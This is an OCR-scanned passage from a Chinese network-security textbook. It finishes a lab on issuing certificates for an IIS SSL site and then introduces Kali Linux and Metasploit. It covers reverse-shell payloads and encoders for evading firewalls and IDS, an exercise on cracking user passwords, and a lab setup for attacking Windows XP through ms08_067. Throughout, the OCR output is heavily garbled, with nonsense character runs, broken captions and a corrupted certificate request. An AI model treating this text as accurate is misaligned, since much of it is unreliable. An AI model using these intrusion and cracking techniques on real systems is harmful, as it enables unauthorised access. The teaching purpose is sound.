示 ; 选择 “文档 ”, 如 图 3-113 所 示 ; 选择 “目录 安全 性 ”, 如 图 3-114 所 示 。 

在 C:\inetpub\wwwroot 下 面 创建 index. htm 主页 文件 ,内 容 是 “您 正在 访问 ssl 
网 站 1”。 

58 3 步 : 在 图 3-114 中 , 单 击 * 服 务 器 证 书 ” 按 钮 ,出 现 如 图 3-115 所 示 对 话 框 , 单 击 “ 下 
一 步 ” 按 钮 ,出 现 如 图 3-116 所 示 对 话 框 ,选择 “新 建 证 书 ”。 后 续 过 程 如 图 3-117 一 图 3-124 
所 示 。 在 图 3-122 中 ,要 记 住 文件 名 的 路 径 , 后 面 申 请 证 书 时 ,要 用 到 该 文件 的 内 容 。 
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图 3-111 Internet 信息 服务 (IIS) 管 理 器 图 3-112 主 目录 
了 aixi 
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图 3-115 Web 服务 器 证 书 向 导 
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图 3-116 服务 器 证 书 
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图 3-117 延迟 或 立即 请 求 


证 书 公 须 包 售 妈 单位 的 相关 全 息 ， 以 便 与 其 好 单位 的 证 书 区 分 开 
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图 3-118 名 称 和 安全 性 设置 
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如果 公 用 名 称 发 生 记 化 ， 则 请 要 获取 新 证 节 . 
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3-119 单位 信息 图 3-120 站 点 公用 名 称 
[Es >| 
地 理 信息 

证 书 颁发 机 构 要 求 下 列 地 理 信息 。 
BRE 
vomo 
pr z 证 书 请 求 文件 各 
mE 以 指定 的 文件 名 梅 证 书 请 求 保存 为 文本 文件 。 
L9 E] 
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Æ 3-121 地 理 信息 


镁 入 证 书 请求 的 文件 各。 
XED: 


F eertrea txt 
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sw [Tm 
图 3-122 证 书 请 求 文件 名 
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" E) 
完成 Web 服务 器 证 书 向 导 
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请 求 文件 摘要 
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图 3-123 请求 文 件 摘要 图 3-124 ”完成 证 书 向 导 


第 4 步 : 在 图 3-114 中 , 单 击 “ 编 辑 ” 按 钮 ,出 现 如 图 3-125 所 示 对 话 框 ,选择 “要 求 安 全 
通道 "和 “要 求 客 户 端 证 书 ”, 单 击 “确定 ”按钮 。 

第 5 步 : 打开 IE 浏览 器 ,在 地 址 栏 输入 http://218. 198.18.93/certsrv/, 如 图 3-126 所 
示 。 单 击 “ 申 请 一 个 证 书 ”, 如 图 3-127 所 示 。 单 击 “ 高 级 证 书 申请 ”, 如 图 3-128 所 示 。 单 击 
“使 用 base64 编码 的 CMC 或 PKCS #910 文件 提交 一 个 证 书 申请 ,或 使 用 base64 编码 的 
PKCS #7 文件 续 订 证 书 申请 ”, 如 图 3-130 所 示 。 将 如 图 3-129 所 示 的 C:\ certreq. txt X. 
本 文件 内 的 内 容 粘 贴 到 “保存 的 申请 ”。 
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厂 局 用 证 书信 任 列表 W 有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 
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图 3-126 选择 任务 
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Hicrosoft 证 书 服务 - 


高 级 证 书 申请 


选择 一 个 证 书 类 型 : A ANEETA: 单 击 下 列 选项 之 一 
Web 浏览 器 证 书 
电子 邮件 保护 证 书 

编码 的 cuc #10 文件 提交 一 个 

或 者 ， 提 交 一 个 高 级 证 书 申请 。 使用 base64 ET PECS #7 文件 续 订 证 


5 p T TT Onm p T T T eus 


图 3-127 证 书 类 型 图 3-128 ”高 级 证 书 申请 
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在 图 3-130 中 单 击 “ 提 交 ” 按 钮 ,申请 的 证 书 处 于 挂 起 状态 ,如 图 3-131 所 示 。 


xim) c FEV Vm IRV Wb | v 
QsE-O-iz ise cwm |O- SUM- 


MEO) [E] nce» 77216 195 18. 93/ cortsrv/ certrort am Een um 


Hicrosoft i 


提交 一 个 证 书 申请 或 续 订 申请 


要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 ” 框 中 粘贴 一 
= 本 个 由 外 部 源 ( 如 Web 服务 器 ) 生 成 的 basc-64 编码 的 CNC 或 
TETTETETT PECS #10 证 书 申请 或 PRCS #7 续 订 申请 。 

-一 BEGIN MEW CERTIFICATE REQUEST-— — 

MI IDSTCCAr ICAQAvD JELMAKGATUEBNNCQ ONxDTALBJNUBAJeBGYZUICXOTALBJNU 
BRceDGWTRExDDRKBQNUBROTRhYUTEHMAOGR TUECXMDS INKMSUVI wYDUQQDHNYA 
egBanGcnxwB3nGknbgaynpnRMHRNzRHHREnRxHIGfHA9GCSq6SIb3DQEBRQUAnhGH Baze-6d 编码 的 
neni naaczICneadi sp nr suce2YS8/code oI oci6KHSITT9 TI CeypR2 证 书 申请 


bil 


保存 的 申请 : 


[AXARRAARAAAAAARAARARAARARARAAARAARAAARAAA A] 
AAAAAAAAAAAAAARARAAAAAAAAAAAAAAAAAAWDOTJ 
DoRr/Vkyd1FHvglus INLE&IiEtUYggvS IKP ZEST 


jiEQcwysznmg8sqLBUL9jrgn2iypeTo2wWrS*pHBF7KafFpagVP*txRVoTIR (cuc gt JoBexNGOnbvkacgFt SUCI Ys 1UgWVyCcF Z hmGABvat 
|n9hsSRCLüny «UVEnCor 2757e IRECQBH7orz YZFF3zusuónrW2xoHwI DA PECS #10 &  |79pRF3/dvhY2T61B+4699yDJPNPGCVF 63 IxvYus-, 
mese: p[L—— IND NEU CERTIFICATE REQUEST--—- 了 


nrnaBgorBgEERYI3p0IDN9wC jUuMi kzMzkuk j IuewVKKvYBBRGCNUI BI 
DgVDUR 0PRQH/BRüDAgTwHEQGCSqGS Ib3DQE JDvQ3HDUvDgY IKoZ IhucNAWICAJCA 


PORE 


UR 
ANNAANAAAAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAANAAAAAAAAAAAAAAAANAR 
ANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAAAAAAAAAAAAAAAAAAANAA 
ANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWDQY JKOZ Inve NAQEF DORDGYER TQPT 
9oRrywkyd1Fhwghus1NLE*IiEtWYggw8IzKPXeSTYYE351Kihf5IW2QghuoganMR 
BaxhqgnBukdcgFt6uUEJYs1UgWuyCcFZznmsnSvgtuEFBYaXa18CwHenEcu3X99LN 
79pRF3aydvhy2T6iB*69syDJPMNPGcuF6jIxwyws= 

--END MEM CERTIFICATE REQUEST-———-| 


图 3-129 certreq. txt 文件 内 容 


osoft 证 书 服务 - Bicrosoft Internet Explorer 


文件 中 MV 3o mu ZXm Map 


Nicrosoft 证 


您 的 证 书 申请 已 经 收 到 。 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 的 证 书 。 
您 的 申请 Id 为 2。 
请 在 一 天 或 两 天 内 返回 此 网 站 以 榨 素 您 的 证 书 。 


注意 : 您 必须 用 此 Web 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 
LT TT T ens 


图 3-131 RA 结构 


第 6 步 : 在 证 书 服务 器 上 (218. 198. 18. 93 计算 机 ) ,依次 选择 “开始 ”程序 ”管理 
工具 ”一 “证 书 颁发 机 构 ”, 出 现 如 图 3-132 所 示 对 话 框 。 单 击 左 侧 栏 的 “ 挂 起 的 申请 ”, 在 右 


侧 栏 右 击 一 个 挂 起 的 申请 ,依次 选择 “所 有 任务 ”>“ 颁 发 ”。 
ET 9 


Ca 失 网 的 中 请 


BERUF GE TEN 


图 3-132 证 书 颁发 机 构 
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第 7 步 : 选择 218. 198. 18. 93 计算 机 。 在 图 3-126 中 单 击 “ 查 看 挂 起 的 证 书 申请 的 状 
态 ”, 出 现 如 图 3-133 所 示 对 话 框 , 单 击 * 保 存 的 申请 证 书 ”。 如 图 3-134 所 示 , 单 击 “下 载 证 
书 链 ”。 如 图 3-135 所 示 , 单 击 “ 保 存 ” 按 钮 ,将 文件 certnew. p7b 保存 在 桌面 上 。 


ET BES Tr 
IFO RAD FEV PRO IAV Hio Je 
QsE-2- 入 | 站 搜索 RRR € = 

sio [eis s 


E! 
证 书 已 颁发 
ES 您 申请 的 证 节 已 颁发 给 您。 
查看 挂 起 的 证 书 申请 的 状态 rms ji 
GMESRUPROULUR E: CDER 编码 sk CBase 64 编码 

c) 下载 证 书 
保存 的 里 请 sA E e 2 
[EL I [ jo smus ix I Er jo nass 4 


图 3-133 ”查看 证 书 申请 状态 


第 8 步 : 在 图 3-114 中 , 单 击 * 服 务 器 证 书 ? 按 钮 。 在 如 图 3-136 所 示 对 话 框 , 单 击 


图 3-134 中 国 金融 CA 结构 


步 ” 按 钮 。 后 续 过程 如 图 3-137 一 图 3-141 所 示 , 完 成 证 书 的 安装 。 


您 想 打开 或 保存 比 文 件 吗 ? 
和 名称; certnew pTb 


RN: ncs #7 ups, 2.05 Ke 
发 送 者 : 219.199.1993 


nro | [RE w^ 


R 打开 此 基文 件 之 前 总 是 询问 QD 


Q Higuera 


图 3-135 文件 下 载 


dem tus 
— 


存在 挂 起 的 证 书 清末 加 同 处 理 ? 
C OBORHODESEE SERERE QD] 
出 了 挂 起 的 清末 D 


«r-ee[r-5]»] we 


欢迎 使 用 Web 服务 器 证 书 向 导 
和 要 ind 


Web 服务 器 状态 
rad 


s *T—5" Sitat. 


“oz sm | 


图 3-136 证 书 向 导 


E 


MURDER. 
通过 答案 包 寺 证 书 全 长 机 Na 应 的 六 来 处 香 扩 起 的 证 蔬 清 求 ， 


V BSUURE USATE R. 


路 径 和 文件 各 中) 
Fie a Settings nini strater VR cer new. pTb 


go). 


| 


图 3-137 挂 起 的 证 书 请 求 
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图 3-138 ”处 理 挂 起 的 请 求 


第 3 章 BARR] 


ax Hs 证 书 和 导 B 


ssr wo 
为 此 网 站 指定 ssL IRO. 


uem 
Ej RUREIT SEE. 


此 网 站 应 该 合用 的 SSL RO D. 


Ll Li] 
图 3-139 SSL 端口 图 3-140 证书 摘要 


第 9 步 : 在 图 3-142 中 , 单 击 “ 查 看 证 书 ” 按 钮 。 在 如 图 3-143 所 示 对 话 框 中 ,查看 安装 
的 证 书 。 单 击 “ 确 定 ” 按 钮 回 到 图 3-142 中 , 单 击 “ 确 定 ” 按 钮 ,SSL 网 站 创建 完成 。 


a 
Ru | we |o rwrwtB | 主 B 录 | xe | 
目录 安全 性 | rr x. l BELMA | 
身份 验证 和 访问 控制 
E a jp SU HER RURA (AU 
完成 Web 服务 器 证 书 向 导 to x LT 
or 地 直 和 域名 限制 一 一 一 一 一 一 一 
Je ER PA ein 
ERDER veo 服务 器 证 书 疝 导 。 多 fie a. 
REGE HRCESRTUS. saD 
JORHORREWW. MOARACBESUERS , TURMZTAS. MÀ À— € 
安全 通信 
EA ZARE. ERSERSBAE Qr ace 
Ph AR BARAA. I CI TC 
LI 
Lm. | 
图 3-141 证 书 安装 完成 图 3-142 ztg 网 站 属性 


3. 配置 客户 端 

第 1 步 : 在 客户 端 (218. 198. 18. 91 计算 机 ) 打 开 IE 浏览 器 ,在 地 址 栏 输入 http:// 
218. 198. 18. 93/certsrv ,出 现 类 似 图 3-126 所 示 的 页 面 , 单 击 “ 下 载 一 个 CA 证 书 、 证 书 链 或 
CRL” ,出现 如 图 3-144 所 示 的 页 面 , 单 击 “ 安 装 此 CA 证 书 链 ”, 出 现 如 图 3-145 所 示 的 对 话 
框 , 单 击 “ 是 ”按钮 添加 证 书 。 安装 CA 证 书 链 后 ,客户 机 的 登录 用 户 就 会 信任 此 CA 服务 器 
(证 书 服务 器 )。 

第 2 步 : 向 CA 服务 器 申请 Web 浏览 器 证 书 , 先 回 证 书 服务 首页 ,类 似 图 3-126 所 示 的 
页 面 , 单 击 “ 申 请 一 个 证 书 ”, 出 现 如 图 3-146 所 示 的 页 面 , 单 击 “Web 浏览 器 证 书 ”, 出 现 如 
图 3-147 所 示 的 页 面 ,填写 用 户 信 息 , 单 击 “ 提 交 ” 按 钮 .出 现 如 图 3-148 所 示 的 对 话 框 , 单 击 
“是 ”按钮 ,出 现 如 图 3-149 所 示 的 页 面 .表示 申请 的 证 书 到 达 CA 服务 器 并 处 于 挂 起 状态 。 
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CER deem | ese | 


证 书信 息 


这 个 证 书 的 目的 如 下 
保证 远程 计 复 机 的 身份 


m 
[ES 


有 有效 起 六 日 期 2010-6-4 到 2011-8-4 
f? 你 有 一 个 二 证 书 对 大 的 私 钥 。 


ET 
XM RED FEV ZEW IRV Wb 


O=- 0 NAG e$ 


D [E] http://218 198 18. 99/certerv/certeure asp 


下 载 CA 证 书 、 证 书 链 或 _CRL 


要 信任 从 这 个 证 书 颁发 机 构 颁发 的 证 书 ， 安 装 此 _CA 证 书 链 。 
要 下 载 一 个 CA 证 书 、 证 书 链 或 CRL， 选 择 证 书 和 编码 方法 。 


ca 证 书 : 


— 


ODER 
OBase 64 


图 3-143 证书 内 容 


MEDWE 


图 3-144 下 载 CA 证书、 证书 链 或 CRL 


â TTE E PEREMEHE E ATTE RUE ERNEA, EBATE SERETIR ENER, irm 
您 想 让 此 程序 现在 添加 证 书 吗 ?加 果 您 信任 此 癌 站 ， 请 单 击 “ 是 ”。 否则 ,清单 击 E” o 


so | 


图 3-145 


ELO 证 书 服务 - icrosoft Internet E 
XM) MAD SEQ) BRW IRD HMW 


Ou- O [9 [2 (à Dn km O 


He) [Bun 7/218 199.16 S3/eertsr/certraws asp v E PEL Ge 


Microsoft 证 书 服 : 7 主页 
申请 一 个 证 书 
选择 一 个 证 书 类 型 : 
Web 浏览 器 证 书 
电子 邮件 保护 证 书 
或 者 ,提交 一 个 高 级 证 书 申请 。 


潜在 的 脚本 冲突 


ET 
xq) SAV 查看 中 ZAW IAV "boo 


O~- O NAGA 
30) [E nep: //z16. 198 16_93/eertsrv/ cor trabi. 


Microsort 


Reb 浏览 器 证 书 - 识别 信息 


要 完成 您 的 证 书 ， 在 下 面 的 框 中 输入 要 求 的 信息 。 
: [fero 


国家 地区): 


更 多 选项 : 


选择 一 个 加 密 服务 提供 程序 : 
CSP: [Microsot Enhanced Cryptographic Pronder i 
口 局 用 强 私 外 保护 
申请 格式 : OCC OPKCS10 
如 果 您 凋 要 一 个 未 在 此 处 列 出 的 高 级 选项 。 请 使 用 “高 级 证 书 申请 ” 窗 体 。 


DEA 


E 3-146 ”申请 一 个 证 书 


86 


[rem 


图 3-147 用 户 信 息 


xe 


microsoft 证 书 服务 — Kicrosoft Internet Explorer 


XPO we] FEV EEG IAV Who 


Qm.O Hia x reme 


和 您 的 证 书 申请 已 经 收 到 。 但是， 您 必须 等 符 管理 员 颁发 您 申请 的 证 书 。 
c eoe 和 您 的 申请 Id 为 10. 
A EERTE ru t. Enc tto PIOSERUER. 请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 


BR: DUARI Veb MEET 10 天 内 返回 以 检索 亿 的 证 书 
[CX z 
—8-9 | [Im 


图 3-148 ”潜在 脚本 冲突 图 3-149 证书 挂 起 状态 


第 3 步 : 在 证 书 服务 器 上 (218. 198. 18. 93 计算 机 ) 依 次 选择 “开始 ”一 “程序 ”>“ 管 理工 
具 ”>“ 证 书 颁发 机 构 ” 命 令 , 出 现 如 图 3-150 所 示 对 话 框 。 单 击 左 侧 栏 的 “ 挂 起 的 申请 ”, 在 
右 侧 栏 右 击 一 个 挂 起 的 申请 ,依次 选择 "所 有 任务 ”>“ 颁 发 "命令 。 


图 3-150 ”证书 颁发 机 构 


第 4 步 : 在 客户 端 (218. 198. 18. 91 计算 机 ?打开 IE 浏览 器 ,在 地 址 栏 输入 http://218. 
198. 18. 93/certsrv ,出 现 类 似 如 图 3-126 所 示 的 页 面 , 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ”， 
出 现 如 图 3-151 所 示 的 页 面 , 单 击 “*Web 浏览 器 证 书 ”, 出 现 如 图 3-152 所 示 的 页 面 ,得 知 申 
请 的 证 书 已 经 颁发 , 单 击 “ 安 装 此 证 书 ”, 出 现 如 图 3-153 所 示 的 对 话 框 , 单 击 “ 是 ”按钮 ,出 现 
如 图 3-154 所 示 的 对 话 框 ,表明 证 书 已 经 安装 成 功 。 


J Microsoft BES - Ni 
ZPO MAD FFV RO IRD #MY 


Oa- © EB Ar km @ 


F Microsoft 证 书 服务 - Nicrosoft Interne! 
文件 中。 MD TV HRW IRD HMW 


Or- O BO Ar ke 6 


地 全) [ETw 7/218 198 16 Poortere em AlE s 


D [Bine 77218 196.16 /curterv/corttarh vp MEJA Gn 


Hicrosoft 证 书 服务 


证 书 己 颁 发 
查看 挂 起 的 证 书 申请 的 状态 


您 申请 的 证 书 已 颁发 给 您 。 
请 选择 您 要 查看 的 证 书 申请 : 
web 浏览 器 证 书 (2010 年 6 月 5 日 星期 六 11:33:05) 。 去 装 此 证 书 


[rem CE: 


图 3-151 查看 挂 起 证 书 申请 的 状态 图 3-152 证 书 已 颁发 


一 3 - HPS us ^ 
UH RE EREDE LL GUT EGO MEEMIMU URS EOUE, AFMITEGSITIRGIEN, MU 


图 3-153 ”潜在 的 脚本 冲突 
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第 5 步 : 在 客户 端 (218. 198. 18. 91 计算 机 ) 打 开 IE 浏览 器 ,在 地 址 栏 输入 http://218. 
198. 18. 96/ ,出 现 如 图 3-155 所 示 的 对 话 框 , 单 击 “ 确 定 ” 按 钮 ,接着 出 现 如 图 3-156 所 示 的 
对 话 框 , 单 击 “ 是 ”按钮 ,出 现 如 图 3-157 所 示 的 对 话 框 ,选择 一 个 证 书 。 单 击 “ 确 定 ” 按 钮 ,出 
现 如 图 3-158 所 示 的 页 面 ,看 到 了 SSL 网 站 的 内 容 。 


osoft 证 书 服务 - Hicrosoft Interne 
RD FEV HW IRD Who 
-© Nef 


HAt QD E) http://218 196. 16. 93/cer 


qu) meBssesss ER. 
请 局 站 上 的 其 它 任 何人 都 无 法 看 到 你 与 污 站 点 的 交 
AB. 


DIET BRURURS D 


图 3-154 证 书 安装 成 功 图 3-155 KERRO) 


标识 
e 和 à 您 要 查看 的 网 站 要 求 标识 。 请 过 指证 书 . 


人 ere 
O 法 安全 证书 由 可 全 的 办 证 机 构 改行。 P jsjCh 
po 
法 安 全 证 的 日 基站 
© 
D 安全 证 书 上 的 名 称 无 入 ， 隘 闭 与 站 点 各 各 下 EGE。 
annt EEO 


EU] CTO T CD Cm 


图 3-156 ”安全 警报 (2) 图 3-157 选择 证 书 


F https://218. 198. 18. 96/ - Hic 
IPD MED s&o wm) IAT” @ 


an-© OG Pu 


IBE D Eye //218 9 1 x; EAS sem 
您 正在 访问 SSL 网 站 !1! 


BS gius 


图 3-158 看 到 了 SSL 网 站 的 内 容 


38 本 章 小 结 


本 章 介 绍 了 常用 加 密 方法 、 密 码 学 的 基本 概念 、 破 解 用 户 密码 的 方法 .文件 加 密 的 方法 、 
数字 签名 技术 以 及 PKI。 并 且 通 过 对 一 系列 实例 的 介绍 ,加深 读 者 对 基础 安全 方面 的 基础 
知识 和 技术 的 理解 ,使 读者 能 够 运用 一 些 工 具 软 件 来 保护 自己 在 工作 或 生活 中 的 机 密 或 隐 
私 数据 。 
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39 J 题 

1. 填空 题 

(1) 一 般 来 说 ,信息 安全 主要 包括 和 两 个 方面 。 

(2) 是 保障 信息 安全 的 核心 技术 , 它 以 很 小 的 代价 ,对 信息 提供 一 种 强 有 力 的 
安全 保护 。 

(3) 是 用 某 种 方法 将 文字 转换 成 不 能 直接 阅读 形式 的 过 程 。 

(4) 加 密 一 般 分 为 3 类 ,是 和 o 

(5) 从 密码 学 的 发 展 历程 来 看 , 共 经 历 了 * 和 


(6) 对 称 加 密 算 法 又 称 传统 密码 算法 ,或 单 密 钥 算法 ， 其 采用 了 了 对称 密码 编码 技术 ， 其 
特点 " 

CD 对 称 加 密 算法 的 安全 性 依赖 于 

(8) 主要 的 非 对 称 加 密 算法 有 和 等 。 

(9) 的 缺点 是 密码 算法 一 般 比 较 复 杂 , 加 、 解 密 速度 较 慢 。 因 此 ,实际 网 络 中 
的 加 密 多 采用 和 相 结 合 的 混合 加 密 体制 。 

(10) 是 实现 交易 安全 的 核心 技术 之 一 , 它 的 实现 基础 就 是 加 密 技术 ,能 够 实 
现 电子 文档 的 辨认 和 验证 。 

(11) 是 创建 .颁发 ,管理 和 撤销 公 钥 证 书 所 涉及 的 所 有 和 软件、 硬件 系统 ,以 及 
所 涉及 的 整个 过 程 安全 策略 规范 ,法律 法 规 和 人 员 的 集合 。 

a2) 是 PKI 的 核心 元 素 ， 是 PKI 的 核心 执行 者 。 

2. 思考 与 简 答 题 

(1) 简 述 对 称 加 密 算法 的 优 缺 点 。 

(2) 简 述 非 对 称 加 密 算 法 的 优 缺 点 。 

(3) 简 述 数字 签名 的 过 程 。 

(4) 简 述 PKI 系统 的 组 成 以 及 每 个 部 分 的 作用 。 

3. 上 机 题 

COD F PGP 软件 ,根据 3.1 节 的 内 容 , 安 装 并 使 用 加 密 软 件 PGP 对 文件 进行 加 密 、 
解密 。 

(2) 使 用 密码 破解 工具 John the Ripper 对 Windows 和 Linux 用 户 密 码 进 行 破解 。 

(3) 构建 基于 Windows 2003 的 CA 系统 。 
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本 章 学 习 目 标 

。 掌握 Metasploit 的 使 用 方法 。 

。 初步 了 解 Linux 系统 的 安全 配置 。 

* ff Linux 自主 访问 控制 与 强制 访问 控制 的 概念 。 
。 了解 计算 机 系统 的 安全 等 级 标准 。 


操作 系统 (Operating System) 是 一 组 面向 机 器 和 用 户 的 程序 ,是 用 户 程 序 和 计算 机 硬 
件 之 间 的 接口 ,其 目的 是 最 大 限度 、 高 效 、 合 理 地 使 用 计算 机 资源 ,同时 对 系统 的 所 有 资源 
(软件 和 硬件 资源 ) 进 行 管 理 。 计 算 机 系统 的 安全 极 大 地 取决 于 操作 系统 的 安全 ,计算 机 操 
作 系 统 的 安全 是 利用 安全 手段 防止 操作 系统 本 身 被 破坏 ,防止 非法 用 户 对 计算 机 资源 的 
窃取 。 


41 操作 系统 安全 基础 


在 计算 机 系统 的 各 个 层次 上 ,硬件 、 操 作 系 统 、 网 络 软件 、 数 据 库 管理 系统 软件 以 及 应 用 
软件 ,各 自在 计算 机 安全 中 都 肩负 着 重要 的 职责 。 在 软件 的 范畴 中 ,操作 系统 处 在 最 底层 ， 
是 所 有 其 他 软件 的 基础 , 它 在 解决 安全 上 也 起 着 基础 性 ,关键 性 的 作用 ,没有 操作 系统 的 安 
全 支持 ,计算 机 软件 系统 的 安全 就 缺乏 了 根基 。 

上 层 软件 要 获得 运行 的 可 靠 性 和 信息 的 完整 性 、 保 密 性 ,必须 依赖 于 操作 系统 提供 的 系 
统 软件 作为 基础 。 在 网 络 环境 中 ,网 络 安全 依赖 于 网 络 中 各 主机 的 安全 性 ,而 各 主机 系统 的 
安全 是 由 操作 系统 的 安全 性 决定 。 


42 Kai Linux 


黑客 和 安全 研究 员 需 要 手边 随时 都 有 整套 的 黑客 工具 ,Kali Linux 恰 是 他 们 所 需 的 ， 
Kali Linux 预 装 了 许多 黑客 工具 .包括 nmap, Wireshark,John the Ripper, Aircrack-ng 等 。 
Kali Linux 是 基于 Debian 的 Linux 发 行 版 ,专门 设计 用 于 数字 取证 和 渗透 测试 。 渗 透 测试 
是 通过 模拟 恶意 黑客 的 攻击 方法 ,来 评估 计算 机 网 络 系统 安全 的 一 种 评估 方法 。 这 个 过 程 
包括 对 系统 的 任何 弱点 .技术 缺陷 或 漏洞 的 主动 分 析 。 渗 透 测 试 流程 可 以 归纳 为 信息 收集 、 
漏洞 发 现 .漏洞 利用 、 维 持 访问 。 


第 4 章 ”操作 系统 安全 技术 


读者 可 以 从 https://www. kali. org/ 下 载 最 新 版 Kali Linux, 根 据 具体 情况 安装 在 物理 
硬盘 或 虚拟 机 中 ,具体 安装 过 程 本 书 不 做 介绍 。 本 书 使 用 Kali Linux 2.0. 


43 Vetaspait 


Metasploit 是 一 款 开源 的 安全 漏洞 检测 工具 ,几乎 包含 了 渗透 测试 中 所 有 用 到 的 工具 ， 
每 一 种 工具 都 有 其 对 应 的 使 用 环境 ,针对 性 比较 强 。Metasploit 可 以 帮助 安全 和 IT 专业 人 
员 识 别 安全 性 问题 ,验证 漏洞 的 缓解 措施 。 通 过 它 可 以 很 容易 地 获取 、 开 发 并 对 计算 机 软件 
漏洞 实施 攻击 。 它 本 身 附 带 数 百 个 已 知 软件 漏洞 的 专业 级 漏洞 攻击 工具 。 当 H. D. Moore 
在 2003 年 发 布 Metasploit 时 ,计算 机 安全 状况 也 被 永久 性 地 改变 了 。 仿 佛 一 夜 之 间 ,任何 
人 都 可 以 成 为 黑客 ,每 个 人 都 可 以 使 用 攻击 工具 来 攻击 那些 未 打 过 补丁 的 漏洞 。 软 件 厂商 
再 也 不 能 推迟 发 布 针对 已 公布 漏洞 的 补丁 了 ,这 是 因为 Metasploit 团队 一 直 都 在 努力 开发 
各 种 攻击 工具 ,并 将 它们 贡献 给 所 有 Metasploit 用 户 。 它 集成 了 各 平台 上 常见 的 溢出 漏洞 
和 流行 的 shellcode, 并 且 不 断 更 新 。 最 新 版 本 的 MSF(Metasploit Framework Console) 包 
含 了 1467 种 流行 的 操作 系统 及 应 用 软件 的 漏洞 ,以 及 432 个 shellcode。 作 为 安全 工具 , 它 
在 安全 检测 中 有 着 不 容 忽视 的 作用 ,并 为 漏洞 自动 化 探测 和 及 时 检测 系统 漏洞 提供 了 有 力 
的 保障 。Metasploit 包含 了 多 种 Exploit 和 Payload, 

1. Exploit 

Exploit 操纵 计算 机 系统 中 特定 漏洞 的 恶意 代码 。Metasploi 提供 了 跨 多 个 操作 系统 和 
应 用 程序 的 Exploit ,提供 了 突破 一 台 计 算 机 的 多 种 途径 。 可 以 用 Nessus 搭配 Nmap 进行 
漏洞 扫描 ,使 用 Metasploit 进行 漏洞 利用 。 在 确定 一 个 特定 的 漏洞 却 无 法 在 Metasploit 数 
据 库 中 找到 对 应 的 Exploit 时 ,可 以 通过 访问 https://www. exploit-db. com/ 查 找 并 下 载 该 
漏洞 的 利用 程序 ,将 其 导入 Metasploit 的 数据 库 中 作为 一 个 Exploit。 

2. Payload 

利用 漏洞 之 前 要 先 建 立 一 个 Payload, 其 作用 是 确定 漏洞 攻击 成 功 之 后 要 执行 什么 操 
作 ,Payload 基本 上 是 用 于 访问 远程 计算 机 的 反 向 Shell, 并 且 通 过 Shell 向 被 入 侵 的 计算 机 
植 入 后 门 。 

3. Encoders 

不 能 确保 所 有 Metasploit 中 的 Exploit 都 可 以 正常 工作 ,有 时 会 遇 到 防火 墙 \IPS、IDS 
等 ,所 有 的 试图 攻击 可 能 会 被 防火 墙 过 滤 掉 ,这 时 就 需要 使 用 Encoders 来 对 Exploit 进行 编 
码 , 来 逃避 防火 墙 .IPS IDS 的 检测 。 

4. Options 

所 有 的 Exploit 和 Payload 都 有 一 些 内 置 的 参数 ,诸如 远程 了 P、 本 地 IP, LPORT, 
RPORT 服务 路 径 . 用 户 名 等 。 在 利用 Exploit 之 前 需要 对 这 些 参数 进行 配置 ,可 以 使 用 
Show Options 命令 来 显示 具体 的 选项 。 

5. msfupdate,msfconsole 


在 使 用 之 前 建议 对 Metasploit 进行 更 新 ,方便 利用 最 新 的 漏洞 Exploit ,更 新 命令 如 下 。 
root(kali:— # msfupdate 


91 


msíconsole 是 最 实用 、 最 强大 的 集 各 种 功能 于 一 体 的 漏洞 利用 框架 ,可 以 使 用 
msfconsole 发 起 攻击 、 加 载 辅助 模块 .进行 枚 举 、 创 建 监听 器 、 对 整个 网 络 情 况 进 行 探测 ,用 
如 下 命令 启动 msfconsole。 


root@kali:~ # msfconsole 


6. 导入 Exploit 到 Metasploit 

Metasploit 框架 允许 将 自己 开发 的 Exploit 导入 exploits 数据 库 , 支 持 C, Ruby, Perl, 
Python 等 语言 。Metasploit 中 所 有 的 Exploit 都 是 按照 不 同 的 系统 类 型 等 进行 分 类 的 , 具 
体 的 目录 是 在 /usr/share/metasploit-framework/modules/exploits 目录 中 。 


root@kali:~ # ls /usr/share/metasploit - framework/modules/exploits/ 


aix/ apple ios/ dialup/ freebsd/ irix/ multi/ osx/ unix/ 
android/ bsdi/ firefox/ hpux/ linux/ ^ netware/ solaris/ windows/ 
root@kali:~ # find / - name exploits 

/usr/share/beef - xss/modules/exploits 

/usr/share/set/src/fasttrack/exploits 

/usr/share/metasploit — framework/modules/exploits 

/usr/share/metasploit - framework/data/exploits 

/usr/share/inguma/modules/exploits 

/usr/share/framework2/exploits 

root(ükali:-- # 


44 实例 : 入 侵 Windows XP 


1. 实验 环境 
实验 环境 如 图 4-1 所 示 。 
192.168.201.133 192.168.201.135 
Kali Linux 2.0 Windows XP SP1 
攻击 机 目标 机 
图 4-1 实验 环境 


具体 环境 搭建 : 宿主 机 操作 系统 是 Windows 7( 建 议 有 8GB 以 上 内 存 ) ,使 用 VMware 
10. 0 构建 两 个 虚拟 机 ,分 别 是 Kali Linux 2. 0 和 Windows XP SP1, 然 后 启动 这 两 个 虚拟 
BL. Windows XP SP1 作为 被 渗透 的 目标 机 ,IP 地 址 为 192. 168. 201. 135; Kali linux 2. 0 
作为 攻击 机 ,IP 地 址 为 192. 168. 201. 133 ,利用 ms08_067 漏洞 入侵 Windows XP SP1. 

2. 入 侵 过 程 

第 1 步 : 在 Kali Linux 系统 终端 运行 service postgresql start 命令 ,开启 SQL 数据 库 服 
务 。 接 着 在 终端 执行 msfconsole 命令 ,如 图 4-2 所 示 。 

“msf 二 ”提示 符 后 面 可 以 使 用 的 主要 命令 见 表 4-1。 
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show exploits 


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro 
Learn more on http: // rapid7. com/ metasploit 


*[ metasploit v4. 11. 4- 2015071403 ] 
+ -- ---[ 1467 exploits - 840 auxiliary - 232 post ] 
|t -- --=[ 432 payloads - 37 encoders - 8 nops ] 

] 


=[ Free Metasploit Pro trial: http://r-7.co/trymsp 


[nst > 
4-2 在 终端 执行 msfconsole 命令 
表 4-1 “msf 一 ”提示 符 后 面 可 以 使 用 的 主要 命令 


列 出 metasploit 框架 中 的 所 有 渗透 攻击 模块 


show payloads 


列 出 metasploit 框架 中 的 所 有 攻击 载荷 


show auxiliary 


